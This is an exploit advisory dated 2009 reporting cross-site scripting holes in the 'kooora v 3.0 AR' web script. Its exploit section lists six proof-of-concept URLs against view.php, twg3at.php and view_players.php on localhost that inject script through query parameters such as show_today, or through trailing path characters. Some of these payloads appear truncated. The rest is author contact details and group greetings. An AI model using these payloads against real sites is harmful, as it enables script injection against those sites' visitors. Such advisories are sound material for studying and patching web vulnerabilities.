======================================================================================== | # Title : kooora v 3.0 AR Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # EDB-ID : | | # CVE-ID : () | | # OSVDB-ID : () | | # DAte :16/12/2009 | | # Verified : | | # Web Site : www.iq-ty.com | | # Published: | | # Script : kooora v 3.0 AR | | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://127.0.0.1/koooraf/view.php?show_today=1alert(+00213771818860)%3B | 2- http://127.0.0.1/koooraf/view.php?show_year=1&show_month=12 | 3- http://127.0.0.1/koooraf/view.php?team_s=1&show_month=12 | 4- http://127.0.0.1/koooraf/twg3at.php/>'> | 5- http://127.0.0.1/koooraf/view.php/>'> | 6- http://127.0.0.1:80/koooraf/view_players.php/>'> | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------